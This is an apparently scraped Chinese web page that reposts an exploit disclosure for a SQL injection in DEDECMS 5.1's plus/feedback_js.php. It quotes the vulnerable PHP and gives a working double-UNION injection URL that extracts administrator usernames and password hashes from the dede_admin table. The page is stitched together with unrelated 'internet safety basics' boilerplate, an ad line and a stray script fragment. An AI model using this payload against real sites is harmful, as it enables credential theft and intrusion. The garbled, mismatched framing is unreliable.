軟件安裝：裝機(jī)軟件必備包

隨著網(wǎng)絡(luò)的普及，我們的生活越來越方便，但是網(wǎng)絡(luò)安全也成了很多人面臨的一個問題。特別是那些有著商業(yè)數(shù)據(jù)的企業(yè)電腦，更要注意上網(wǎng)安全常識，不然病毒會對我們造成嚴(yán)重的威脅。

作者:st0p&Rainy'Fox

同樣是在magic_quotes_gpc=off的情況下可用

漏洞版本:DEDECMS 5.1

此漏洞可拿到后臺管理員的帳號和加密HASH,漏洞存在文件plus/feedback_js.php,未過濾參數(shù)為$arcurl

......

$urlindex = 0;

if(empty($arcID))

{

$row = $dlist->dsql->GetOne("Select id From `#@__cache_feedbackurl` where url='$arcurl' ");

//此處$arcurl沒有過濾

if(is_array($row)) $urlindex = $row['id'];

//存在結(jié)果則把$urlindex賦值為查詢到的$row['id'],我們可以構(gòu)造SQL語句帶入下面的操作中了

}

if(empty($arcID) && empty($urlindex)) exit();

//如果$arcID為空或$urlindex為空則退出

......

if(empty($arcID)) $wq = " urlindex = '$urlindex' ";

//我們讓$arcID為空,剛才上面執(zhí)行的結(jié)果就會被賦值給$wq帶入下面的操作中執(zhí)行了.

else $wq = " aid='$arcID' ";

$querystring = "select * from `#@__feedback` where $wq and ischeck='1' order by dtime desc";

$dlist->Init();

$dlist->SetSource($querystring);

看一下利用方法吧,嘿,為了閉合我用了兩次union

http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 as msg from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='

javascript:contentimage(this);>

唉,偶和Rainy'Fox這家伙找目標(biāo)測試的時候,他竟然說能不能在magic_quotes_gpc=on時通過....這種想法太YD了..也太可怕了,要真可以實(shí)現(xiàn),這個網(wǎng)絡(luò)界又該亂了,好多程序都是在PHP默認(rèn)magic_quotes_gpc為關(guān)閉時才會調(diào)用自身的轉(zhuǎn)義部分...要真能實(shí)現(xiàn),那就是PHP程序的惡夢了...

上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識，學(xué)習(xí)了安全知識，幾乎可以讓你免費(fèi)電腦中毒的煩擾。

軟件推薦：

與50位技術(shù)專家面對面20年技術(shù)見證，附贈技術(shù)全景圖

總結(jié)

以上是生活随笔為你收集整理的php5.1 0day,DEDECMS 5.1 feedback_js.php 0DAY的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。